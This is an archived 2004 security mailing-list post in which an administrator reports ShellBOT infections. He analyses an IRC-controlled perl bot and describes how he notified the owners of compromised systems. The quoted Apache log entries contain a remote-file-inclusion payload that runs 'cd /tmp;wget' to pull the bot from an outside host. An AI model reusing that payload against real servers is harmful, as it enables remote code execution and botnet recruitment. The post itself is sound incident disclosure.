Security Incidents mailing list archives
Systems compromised with ShellBOT perl script
From: Kirby Angell <kangell () alertra com>
Date: Wed, 01 Sep 2004 11:53:39 -0500
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Yesterday we noticed a funny looking Apache log entry. It contained: http://www.DOMAIN.com/index.php?id=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2 in the Referer entry. The actual HTTP request was inocuous, but the Referer entry is not. I have been in contact with the owner of the computer that was the apparent target of the attack and he reports that the "index.php" page properly sanitizes its variables to keep this from working. The attack attempts to trick the server into downloading and running the given perl script, ".egg2" in this case. I retrieved a copy of that script and found it configured to log into an IRC server (irc.mzima.net:6667). Once the script is logged in, it joins the channel "#datalink" and then waits for private messages from its handler. The script can perform limited portscans, denial of service attacks, and can run shell commands as whatever user the compromised web server was running as. The script hides its identity by changing it process name to "[httpd]" so it looks like one of many server threads. I logged into the IRC server and joined the channel to find 62 compromised systems listening. Unfortunately I was noticed and now the channel is by invitation only. I have notified as many of the administrators for those systems as could be identified from whois records. I have also notified the operators of the IRC server. The IP address of the system that set off the original inquiry is 63.227.76.25. The admin of one of the compromised boxes has found that same IP address involved in their attack too. The Apache log entries from their system look like this: 63.227.76.25 - - [30/Aug/2004:23:38:57 -0400] "GET /popwin.js HTTP/1.0" 200 195 "http://www.domain.com/aboutus/index.php?page=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626 Firefox/0.9.1" 63.227.76.25 - - [30/Aug/2004:23:38:57 -0400] "GET /images/l2_thinkInsideBox.gif HTTP/1.0" 200 1711 "http://www.domain.com/aboutus/index.php?page=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626 Firefox/0.9.1" 63.227.76.25 - - [30/Aug/2004:23:38:57 -0400] "GET /images/l2topbox.gif HTTP/1.0" 200 2576 "http://www.domain.com/aboutus/index.php?page=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626 Firefox/0.9.1" I would like to find if he used other IPs, but so far I've only had a few responses from admins of the compromised systems. All who responded were happy to provide log entries though. This sort of script shouldn't be terribly difficult to spot. A "netstat ~ -pan | grep 6667" will show its presence while running. Unless some other compromise is used in conjunction with the script, the cracker will not be able to install any sort of rootkit to hide the script's presence. - -- Thank you, Kirby Angell Get notified anytime your website goes down! http://www.alertra.com key: 9004F4C0 fingerprint: DD7E E88D 7F50 2A1E 229D 836A DB5B A751 9004 F4C0 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQFBNf6S21unUZAE9MARAsM4AJ42p2IPmHMQhw2pgbhkC3ByEnOtPgCdEhB5 Db2zzLBt5pxpszLBuvA/Ap0= =fDUu -----END PGP SIGNATURE-----
Current thread:
- Systems compromised with ShellBOT perl script Kirby Angell (Sep 02)
- Re: Systems compromised with ShellBOT perl script nathan c. dickerson (Sep 07)